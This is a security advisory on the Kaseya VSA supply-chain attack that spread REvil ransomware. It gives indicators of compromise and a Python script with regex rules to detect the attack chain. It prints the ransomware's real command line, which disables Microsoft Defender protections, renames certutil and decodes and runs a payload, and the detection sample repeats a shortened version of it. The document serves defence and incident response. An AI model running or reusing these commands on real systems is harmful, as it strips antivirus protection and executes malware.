Currently there is a widespread ongoing supply chain attack targeting MSPs by using Kaseya VSA to distribute a version of REvil ransomware onto customers' environments. At this time multiple MSPs have been hit as part of this. Kaseya VSA is both a cloud-based and on-premises MSP platform used for patch management and client monitoring.
Kaseya has issued a security advisory urging customers running the on-premises solution to shut down their servers running VSA until further notice. It is critical that this is done as soon as possible, since one of the first things the ransomware does is disable administrative access to the VSA.
How it works
An automatic update was pushed to the product that included the REvil ransomware.
The ransomware will start off by running the following command:
"cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
This will severely cripple Microsoft Defender and disable functionality that would otherwise most likely have prevented the ransomware.
After that it will decode c:\kworking\agent.crt and extract agent.exe, which contains the files MsMpEng.exe and mpsvc.dll. The first file is a legitimate Microsoft Defender executable and the second is the REvil encryptor payload, which makes use of DLL sideloading to inject itself into the legitimate Windows Defender executable and, through that, encrypt the system.
IoCs
SHA-256 hashes:
D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
File paths:
C:\kworking\agent.exe
C:\Windows\mpsvc.dll
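The chain described above (Defender tampering via Set-MpPreference, certutil copied to a new name, a .crt decoded into an executable, staging under c:\kworking) can be hunted for in process-creation telemetry. The following detection script is an added example written for this advisory, not Orange Cyberdefense's or Kaseya's own tooling; the rule names, the "CommandLine:" log format and the sample lines are constructed assumptions.

```python
from __future__ import annotations
import re

# Detection rules derived from the attack chain described above (constructed
# for this example). Each regex matches one step as it would appear in
# process-creation telemetry such as Sysmon Event ID 1 CommandLine fields.
RULES = {
    # Set-MpPreference used to switch off Defender protections
    "defender_tampering": re.compile(
        r"Set-MpPreference\b.*-(DisableRealtimeMonitoring|DisableIOAVProtection|"
        r"DisableScriptScanning|DisableIntrusionPreventionSystem)\s+\$true", re.I),
    # certutil.exe copied to a new name to evade name-based controls
    "certutil_copy": re.compile(r"\bcopy\s+(/y\s+)?\S*certutil\.exe\s+\S+", re.I),
    # renamed (or original) certutil decoding a .crt into an executable
    "certutil_decode_exe": re.compile(r"\S+\.exe\s+-decode\s+\S+\.crt\s+\S+\.exe", re.I),
    # staging directory and file names used by the dropper
    "kworking_staging": re.compile(r"[a-z]:\\kworking\\agent\.(crt|exe)", re.I),
}

def match_rules(command_line: str) -> list[str]:
    """Return the names of all rules that fire on a single command line."""
    return [name for name, rx in RULES.items() if rx.search(command_line)]

def is_suspicious(matched: list[str]) -> bool:
    """Defender tampering or decode-to-exe alone is enough; otherwise require two steps."""
    return ("defender_tampering" in matched
            or "certutil_decode_exe" in matched
            or len(matched) >= 2)

def scan_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Scan CommandLine telemetry lines; return (line_no, rules) for suspicious ones."""
    hits = []
    for n, line in enumerate(lines, 1):
        matched = match_rules(line)
        if is_suspicious(matched):
            hits.append((n, matched))
    return hits

# Constructed sample telemetry: three benign lines and one shortened
# reproduction of the chain from the advisory.
SAMPLE_LOG = [
    "CommandLine: ping 127.0.0.1 -n 4 > nul",
    "CommandLine: certutil.exe -hashfile C:\\Temp\\installer.msi SHA256",
    "CommandLine: powershell.exe Get-MpPreference",
    ("CommandLine: cmd.exe /c powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true "
     "-DisableScriptScanning $true -Force & copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe "
     "& C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & c:\\kworking\\agent.exe"),
]

if __name__ == "__main__":
    for line_no, rules in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(rules)}")
```

Only the fourth sample line fires; the legitimate certutil -hashfile and Get-MpPreference lines do not, which keeps the rule usable as a hunting query rather than a noisy alert.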
Recommendation
Orange Cyberdefense recommends immediately shutting down servers running Kaseya VSA and following further official updates from Kaseya.